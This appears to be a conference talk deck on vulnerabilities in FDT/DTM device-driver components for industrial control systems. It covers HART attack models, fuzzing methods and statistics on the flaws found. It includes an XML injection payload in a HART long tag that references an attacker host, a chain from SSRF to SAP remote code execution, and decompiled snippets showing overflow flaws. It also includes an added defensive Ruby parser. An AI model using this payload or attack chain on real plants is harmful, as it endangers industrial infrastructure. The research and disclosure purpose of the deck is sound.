![Page 1: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/1.jpg)
DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM
Alexander Bolshev (@dark_k3y)
Gleb Cherbov (@cherboff)
Svetlana Cherkasova
![Page 2: DTM COMPONENTS: SHADOW KEYS TO THE ICS …plc4good.org.ua/files/02_materials/hart/dtm_components_security_zn... · DTM COMPONENTS: SHADOW KEYS TO THE ICS KINGDOM ... DCS HMI Industrial](https://reader034.vdocument.in/reader034/viewer/2022051203/5aad2afc7f8b9a9c2e8de424/html5/thumbnails/2.jpg)
whoami: dark_k3y
Alexander Bolshev (@dark_k3y)
IS auditor @
Ph.D.
Assistant Professor @ SPbETU
Distributed systems researcher
Yet another man wearing “some-color hat”
Page 3
whoami: cherboff
Gleb Cherbov (@cherboff)
IS researcher @
Information security researcher
Page 4
whoami:
Svetlana Cherkasova
IS researcher @
Binary Reverse Engineer
Page 5
Agenda
• Introduction to FDT/DTM
• Research scope
• Fuzzing technologies
• Vulnerabilities and weaknesses statistics
• Vulns && funny things
• FDT 2.0
• Conclusions
Page 6
Intro to FDT/DTM
Page 7
ICS 101
• ICS stands for Industrial Control System.
• Today, ICS infrastructures are commonly used in every factory and even in your house, too!
• ICS collects data from remote stations (also called field devices), processes it, and uses automated algorithms or operator-driven supervisory control to create commands to be sent back.
• Thousands of field devices can exist at one facility.
• To control them, Plant Asset Management Systems (PAS or AMS) were invented.
• Plant Asset Management Software = tools for managing plant assets, which lie on the upper/medium levels of ICS and control/monitor/configure field devices.
Page 8
Field protocols
• HART (current loop, 4-20 mA)
• Profibus DP (RS-485)
• Profibus PA (MBP)
• Modbus (RS-485)
• Foundation Fieldbus H1 (MBP)
• …
Page 9
Field devices
Page 10
What is FDT/DTM?
• “The FDT concept defines the interfaces between device-specific software components provided by the device supplier and the engineering tool of the control system manufacturer. The device-specific software component is called DTM (Device Type Manager).” © FDT Group, maintainer of FDT/DTM specification
In short:
• FDT standardizes the communication and configuration interface between all field devices and host systems
• DTM provides a unified structure for accessing device parameters, configuring and operating the devices, and diagnosing problems
Page 11
FDT/DTM layers*
*Picture from http://www.automationworld.com/fdt-group-wants-your-input-yes-yours
Page 12
Typical places of DTMs in modern ICS systems
Diagram (labels only): corporate network with ERP and MES; routers/firewalls; OPC, DCS, HMI and AMS; PLC1, PLC2,3… and PLC7,8… on the industrial bus; field devices.
Page 13
DTM components key concepts
• It is generally not a standalone tool
• ActiveX interfaces defined by the FDT-Spec.
• All rules of the device known
• All user dialogs contained
• Automatic generation of dependent parameters
• Reading and writing of parameters from/to the field device
• Diagnostic functions customized for the device
• No direct connection to any other device
• No information on the engineering environment
• Support for one or more device types
Page 14
FDT/DTM simplified
Diagram (labels only): PAS / Frame Application hosting a COM Container with COM components (CommDTM and DeviceDTM); a modem/gateway on the industrial bus; transmitters and I/O.
Page 15
E&H FieldCare (PAS) – a typical frame application
Page 16
FDT/DTM: architecture internals
Page 17
DTM multilayer concept
Page 18
FDT/DTM architecture
Developers’ dream…
Page 19
FDT/DTM architecture
Developers’ dream… vs. …cruel reality.
Page 20
DTM implementations
• All of this sounds great, but in reality, DTM components are based on such technologies and use such “features” as:
• OLE32
• ActiveX
• Visual Basic 6.0
• .Net
• COM
• XML
• STA
• RPC
Page 21
FDT/DTM Inside
Page 22
FDT/DTM Inside
Page 23
TODO: <Company name>
Page 24
FDT/DTM: COM Apartments
rsdn.ru
Page 25
FDT/DTM: COM Apartments

COM initialization fragments found in DTM components: different threads initialize COM with conflicting apartment models (STA, MTA and legacy CoInitialize) and run their own message pump.

```c
CoInitializeEx (NULL, COINIT_APARTMENTTHREADED);
// Thread 2
CoInitializeEx (NULL, COINIT_MULTITHREADED);
// Thread 3
CoInitializeEx (NULL, COINIT_MULTITHREADED);
// Thread 4
CoInitialize (NULL);
// Thread 5
dwSyncThread = GetCurrentThreadId ();
MSG msg = {0};
while (!sync)
{
    GetMessage(&msg, NULL, 0, 0);
    TranslateMessage(&msg);
    DispatchMessage(&msg);
}
if (g_Apartment)
    CoInitializeEx(NULL,
                   COINIT_APARTMENTTHREADED |
                   COINIT_DISABLE_OLE1DDE);
```
Page 26
FDT/DTM Inside
Page 27
ASLR
DEP
SafeSeh
Stack Cookies
Page 28
Custom XML Parsers

Disassembly of a DTM building its XML data exchange by string concatenation:

```asm
mov     [ebp+var_3C], esp
push    offset "x-schema:FMPDeviceCatalogSchema.xml;x-s"...
push    offset "<?xml version=\"1.0\"?>\n"
lea     ecx, [ebp+this]
mov     byte ptr [ebp+var_4], 17h
call    sub_1150F
push    offset "<FDT xmlns=\"x-schema:DTMParameterSchem"...
push    offset " <DtmDevice fdt:tag=\"\">\n"
lea     ecx, [ebp+var_3C]
push    offset " </DtmDevice>\n"
lea     ecx, [ebp+var_3C]
call    sub_110D8
push    offset "</FDT>\n"
lea     ecx, [ebp+var_3C]
```
Page 29
Research scope
Page 30
Our research goals and scope
• In our research, we want to answer these questions:
• Why is FDT/DTM architecture weak?
• What kind of vulnerabilities in DTM components could cause a compromise of ICS infrastructure?
• What about FDT 2.0 security?
• Also, we want to take a sample of all DTMs and find out how many of them have weaknesses and/or vulnerabilities
• Certified DTMs can be found in the catalog at http://www.fdtgroup.org/product-catalog/certified-dtms
• There are tons of DTMs
• We’ve decided to stick only to HART protocol and analyze ~100 DTMs
Page 31
Why only DTMs for HART devices?
• We are familiar with this protocol
• We have hardware tools to work with and attack HART devices
• HART is used in critical industries, such as power plants, chemical factories, oil & gas, etc.
Page 32
HART in two slides: first
• Highway Addressable Remote Transducer Protocol
• Developed by Rosemount in the mid-1980s
• Physical layer: FSK (copper wiring, 4-20 mA current loop)
• Current loop line length can reach 3 km => possible physical security problem
• Master-slave, half-duplex, 2200 Hz, 1200 bps
• No Authentication/Authorization/Cryptography (*wired)
• HART over IP version exists
• Max packet length – 255 B (standard), ~8 kB (reality).
Page 33
HART in two slides: second
Page 34
Attack model 1: through current loop
Diagram (labels only): the attacker sits on the current loop between the HART transmitter and the HART gateway/master, MitMing and forging a real HART device; the gateway talks over high-level protocols to the PAS with the vulnerable DTM.
Page 35
Real world
HART transmitter connected to current loop
Page 36
Real world
HART transmitter connected to current loop
Page 37
Real world
Wired HART transmitter
Wireless HART transmitter
Page 38
Tools and methods for MITMing HART CL
ICSCorsair
HRTShield for Arduino
For more info on the topic, see: “HART as an attack vector: from current loop to application layer” (S4x14) and “ICSCorsair: how I will PWN your ERP from 4-20mA current loop” (BH USA’14).
Page 39
CL injection demo
Page 40
Demo Infrastructure
Diagram (labels only): transmitter on the current loop (HART analog 4-20 mA line) → HART modem → FieldCare (PAS) → Ethernet → firewall (only HTTP traffic allowed) → corporate network with ERP.
Page 41
Video demo
Page 42
Explanation
Diagram of the demo, with the steps as numbered on the slide:
1. On the current loop, the attacker sends a HART Command 22 (long tag change) packet carrying XML data: `A' xmlns='x-schema:http://q45.ru` (XMLI).
2. The HART gateway/master forwards it as data from the HART transmitter.
3. The PAS (FieldCare) processes the XML data.
4. Request for the remote XSD schema goes out over the Internet to the evil web server.
5. Reply: XSD with SSRF.
6. SAP remote command execution exploit query reaches the ERP (RCE).
Page 43
Let’s return to attack models
Page 44
Attack model 2: through other low-level protocols
Diagram (labels only): the attacker attacks the Profibus DP line between the HART transmitter (on its current loop) and the Profibus/Ethernet gateway, which reaches the PAS with the vulnerable DTM over high-level protocols (e.g. Ethernet, Wi-Fi, radio…).
Page 45
Attack model 3: through upper levels
Diagram (labels only): the attacker MitMs the HART gateway/master and forges HART-IP responses on the high-level protocols (e.g. Ethernet, Wi-Fi, other…) between the gateway and the PAS with the vulnerable DTM; the HART transmitter stays on the current loop.
Page 46
Real world: Emerson marketing demo
Picture (labels only): Wireless HART transmitters and Wireless HART gateways connected by a broadband radio channel to the ICS DCS.
Page 47
Research scope in one slide
114 DTMs from 24 vendors for 752 devices
Page 48
Some vendors
Page 49
Two frameworks
Chart (by DTM): the 114 DTMs split between the dtmManager/dtmGenerator framework, the DTMStudio/DTMLibrary/CoDIA framework and Other/Unknown/Undetectable; the three slices are 64 (56%), 35 (31%) and 15 (13%).
Page 50
Fuzzing
Page 51
How have we fuzzed?
DTM components may be written in different languages and use different runtimes, process models, etc. Thus, we’ve used three different fuzzing methods:
1. Emulate CommDTM and put fuzzed protocol data directly into DeviceDTM (fastest)
2. Emulate device through a virtual serial port
3. Emulate device with hardware (HRTshield, ICSCorsair, etc.) (slowest)
Page 52
Tools that we’ve created for fuzzing
Software:
• HRTParser (HART packet creation/parsing library)
• Ruby HART emulator
• HART DTM Fuzzer (CommDTM)
• FuzzFrame (FDT Frame emulation)
• DTMSpy (logging DTM call stack/XML dataflow).
Hardware:
• ICSCorsair
• HRTShield
Page 53
Fuzzing with special CommDTM component
Diagram (labels only): inside PAS (FieldCare), the HART Fuzzer DTM takes the place of the CommDTM and feeds the target DeviceDTM; it is driven over a UDP server by the Ruby HART emulator (HRTParser lib, Radamsa), with AutoIT for GUI automation.
Page 54
Fuzzing with Virtual Serial Ports
Diagram (labels only): the Ruby HART emulator (HRTParser lib, Radamsa, AutoIT) is connected through a virtual serial port to the real HART CommDTM (CodeWrights) inside PAS (FieldCare), which drives the target DeviceDTM.
Page 55
Fuzzing with hardware tools
Diagram (labels only): the Ruby HART emulator (HRTParser lib, Radamsa, AutoIT) drives ICSCorsair over USB as a HART “transmitter” on the current loop; a HART modem on USB connects PAS (FieldCare) with the HART CommDTM (CodeWrights) and the target DeviceDTM.
Page 56
Results & statistics
Page 57
Found vulnerabilities
By DTM: vulnerable 29 (25%), not vulnerable 85 (75%)
By device: vulnerable 501 (67%), not vulnerable 251 (33%)
Page 58
Types of found vulnerabilities (by DTM)
RCE 3
DoS 6
Other 9
Possible RCE 7
XML injection 2
Race Condition 2
Total: 29 vulnerabilities
Page 59
Tons of DoS and the like
Page 60
But…
SoZ, responsible disclosure!
Page 61
Vendor statistics
Two charts (by DTM and by device) break the findings down by vendor: GE Oil & Gas, MACTek Corporation, Endress+Hauser, Emerson/Rosemount, Honeywell, Magnetrol, Pepperl+Fuchs, ABB, Metso, Invensys/Foxboro, FOXBORO-ECKARDT, KROHNE, Dresser Masoneilan, VEGA.
Page 62
Framework statistics (vulnerable DTMs)
CodeWrights: 28%
M&M: 31%
Other: 41%
Page 63
Vulns & Funny things
Page 64
XSS
Page 65
Too much data? E&H follow standards as always
217 bytes < 255
Page 66
“secure” memcpy
Page 67
M&M Software GmbH
memcpy_s(…
Page 68
Member buffer overflow

Decompiled DTM code (kept as found): the element count comes from the caller-supplied SAFEARRAY and is never compared with the size of the fixed member buffer it is copied into.

```cpp
unsigned lUbound = 0;
SafeArrayGetUBound(parray, 1, &lUbound);   // upper bound controlled by the caller
unsigned rgIndices = 1;
if ( lUbound + 1 > 1 )
{
    do
    {
        // copies lUbound elements into a fixed-size member buffer;
        // no check that rgIndices + 3 stays inside BufferOverflow[]
        SafeArrayGetElement(
            tvar->parray,
            &rgIndices,
            &this->BufferOverflow[rgIndices + 3]);
        ++rgIndices;
    }
    while ( rgIndices < lUbound + 1 );
}
```
Page 69
No boundaries check

Decompiled DTM code (kept as found): the index is taken from the HART packet and used to address an 8-element array without being range-checked.

```cpp
CString strarray [8];
Index = GetIndex (HartPacket);      // index taken straight from the HART packet
strarray[0].Init (L"%-11.0f");
strarray[1].Init (L"%-10.0f");
strarray[2].Init (L"%-9.0f");
strarray[3].Init (L"%-8.0f");
strarray[4].Init (L"%-7.0f");
strarray[5].Init (L"%-6.1f");
strarray[6].Init (L"%-5.2f");
strarray[7].Init (L"%-4.3f");
BadString = &strarray[Index];       // no check that Index < 8
```
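The checks the two snippets above lack, and the length limit from the HART slide (255 B standard), as an added example that is not HRTParser or any code from the talk: a small HART frame parser/builder in Ruby that validates every length field against the bytes actually present, verifies the XOR checksum, refuses payloads over 255 bytes, and treats a Command 20/22 long tag as untrusted input before a DTM would inline it into its XML data exchange, using the tag from the current-loop injection demo as constructed sample input. The frame layout (preamble, delimiter, 1- or 5-byte address, expansion bytes, command, byte count, data, checksum) is assumed from the HART data-link layer.

```ruby
# HART frame parser/builder with the boundary and content checks a DTM should
# apply to device-supplied data. Added example: not HRTParser nor any code from
# the talk. Frame layout assumed: preamble 0xFF bytes, delimiter, 1- or 5-byte
# address, optional expansion bytes, command, byte count, data, XOR checksum.
module HartFrame
  BACK, STX, ACK = 1, 2, 6            # frame types, delimiter bits 0-2
  MAX_DATA = 255                      # byte count is a single octet
  LONG_TAG_LEN = 32                   # Command 20/22 long tag, ISO Latin-1
  XML_META = /[<>&'"]/

  Frame = Struct.new(:long_address, :frame_type, :address, :command, :data)
  class FormatError < StandardError; end

  # Build a frame; refuses payloads the wire format cannot carry rather than
  # silently truncating the byte count.
  def self.build(frame_type:, address:, command:, data:, preamble: 5)
    raise FormatError, "data too long (#{data.size} > #{MAX_DATA})" if data.size > MAX_DATA
    raise FormatError, "address must be 1 or 5 bytes" unless [1, 5].include?(address.size)
    delim = frame_type | (address.size == 5 ? 0x80 : 0x00)
    body = [delim] + address + [command, data.size] + data
    checksum = body.reduce(0) { |acc, b| acc ^ b }
    ([0xFF] * preamble + body + [checksum]).pack("C*")
  end

  # Parse a raw frame (binary String). Every length field is checked against
  # the bytes actually present before it is used as an index.
  def self.parse(raw)
    b = raw.bytes
    i = 0
    i += 1 while i < b.size && b[i] == 0xFF
    raise FormatError, "need at least 2 preamble bytes" if i < 2
    raise FormatError, "truncated before delimiter" if i >= b.size
    start = i
    delim = b[i]
    i += 1
    frame_type = delim & 0x07
    unless [BACK, STX, ACK].include?(frame_type)
      raise FormatError, "unknown frame type #{frame_type}"
    end
    long = (delim & 0x80) != 0
    addr_len = long ? 5 : 1
    exp_len = (delim >> 5) & 0x03     # expansion bytes announced in bits 5-6
    address = b[i, addr_len]
    raise FormatError, "truncated address" if address.nil? || address.size < addr_len
    i += addr_len + exp_len
    command, count = b[i], b[i + 1]
    raise FormatError, "truncated header" if count.nil?
    i += 2
    data = b[i, count]
    raise FormatError, "byte count #{count} exceeds frame" if data.nil? || data.size < count
    i += count
    checksum = b[i]
    raise FormatError, "missing checksum" if checksum.nil?
    calc = b[start...i].reduce(0) { |acc, x| acc ^ x }
    raise FormatError, "checksum mismatch" unless calc == checksum
    Frame.new(long, frame_type, address, command, data)
  end

  # Long tag carried by Command 20 (read) / 22 (write). ACK frames carry the
  # response code and device status in front of the tag.
  def self.long_tag(frame)
    raise FormatError, "not a long-tag command" unless [20, 22].include?(frame.command)
    d = frame.frame_type == ACK ? frame.data[2..-1] : frame.data
    raise FormatError, "long tag must be #{LONG_TAG_LEN} bytes" unless d && d.size == LONG_TAG_LEN
    d.pack("C*").force_encoding("ISO-8859-1")
  end

  # Printable ISO Latin-1 only, and none of the characters that change XML
  # structure when a DTM inlines the tag into its XML data exchange.
  def self.xml_safe_tag?(tag)
    printable = tag.each_char.all? { |c| o = c.ord; o.between?(0x20, 0x7E) || o >= 0xA0 }
    printable && tag !~ XML_META
  end

  # Escape a tag that is kept anyway, so it stays plain text inside XML.
  def self.xml_escape(tag)
    tag.gsub(XML_META, "<" => "&lt;", ">" => "&gt;", "&" => "&amp;",
                       "'" => "&apos;", '"' => "&quot;")
  end
end

# Constructed sample: ACK to Command 20 (Read Long Tag) from a short-address
# device, carrying the 32-byte tag shown in the talk's injection demo.
DEMO_TAG = "A' xmlns='x-schema:http://q45.ru"
DEMO_ACK = HartFrame.build(frame_type: HartFrame::ACK, address: [0x80],
                           command: 20, data: [0x00, 0x00] + DEMO_TAG.bytes)

if __FILE__ == $PROGRAM_NAME
  tag = HartFrame.long_tag(HartFrame.parse(DEMO_ACK))
  puts "tag #{tag.inspect} xml-safe? #{HartFrame.xml_safe_tag?(tag)}"
  puts "escaped: #{HartFrame.xml_escape(tag)}"
  begin
    HartFrame.build(frame_type: HartFrame::STX, address: [0x80], command: 22, data: [0x41] * 300)
  rescue HartFrame::FormatError => e
    puts "builder refused oversized payload: #{e.message}"
  end
end
```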
Page 70
Other useful stats
| Number of components | Stack cookies enabled | DEP enabled | ASLR enabled |
|---|---|---|---|
| 66 | 0 | 0 | 0 |
| 35 | 1 | 0 | 0 |
| 5 | 0 | 1 | 0 |
| 1 | 0 | 1 | 1 |
| 7 | 1 | 1 | 1 |
Page 71
RCE DEMO VIDEO
Page 72
FDT 2.0 -- is it a solution?
Page 73
FDT 2.0 new features
Recently, the FDT Group finally introduced a new version of the FDT specification, v. 2.0. However, only a few devices support it. The key differences from 1.2.1 are:
• Interfaces are .NET-based
• Class architecture redesigned
• Increased performance
• No XML (interaction between FDT objects is based on .NET datatypes rather than XML)
Page 74
Not a complete solution
FDT 2.0 problems:
• Low spread over the industry
• Backward compatibility ((de)serialization to XML for working with FDT 1.2.* could cause problems)
• Managed code will not be a complete solution if unmanaged code is still used (e.g. calling old C++ code from .Net)
Unfortunately, we could not find a real device supported by FDT 2.0 to test it; if you have one, we can borrow it for some time ;)
Page 75
How it works…
Page 76
How it works… -- A patch for security bulletin!
Page 77
How it works… -- A patch for security bulletin!
Page 78
Conclusions
Page 79
Conclusions
• During our research, we have found 29 vulnerabilities in components for 501 devices from 14 vendors
• The quality of most vulnerable DTM components is lower than medium
• However, all these attacks are possible not only because of DTM weaknesses, but also due to fragile ICS architectures. The approach to ICS multilayer networks as a whole should be changed. Otherwise, we will face the risks of such vulnerabilities over and over again.
• FDT 2.0 could compensate for some problems, but, unfortunately, it isn’t actively used now
• Awaiting vendors’ responses and hoping for the best!
Page 80
Links
• Fuzzing tools repository (will be filled upon disclosure):
http://github.com/Darkkey/DTMResearch
• ICSCorsair repository (hardware, firmware, software):
http://github.com/Darkkey/ICSCorsair
• HRTShield repository:
http://github.com/Darkkey/HRTShield
• HART parser repository:
http://github.com/Darkkey/hartparser
Page 81
Thanksgiving service
• Andrey Abakumov for help in finding XML injections
• George Nosenko for special binary magic and great help in reverse-engineering.
• Fedor Savelyev aka Alouette for some fuzzing ideas
Page 82
Q&A? @dsecru
@dark_k3y @cherboff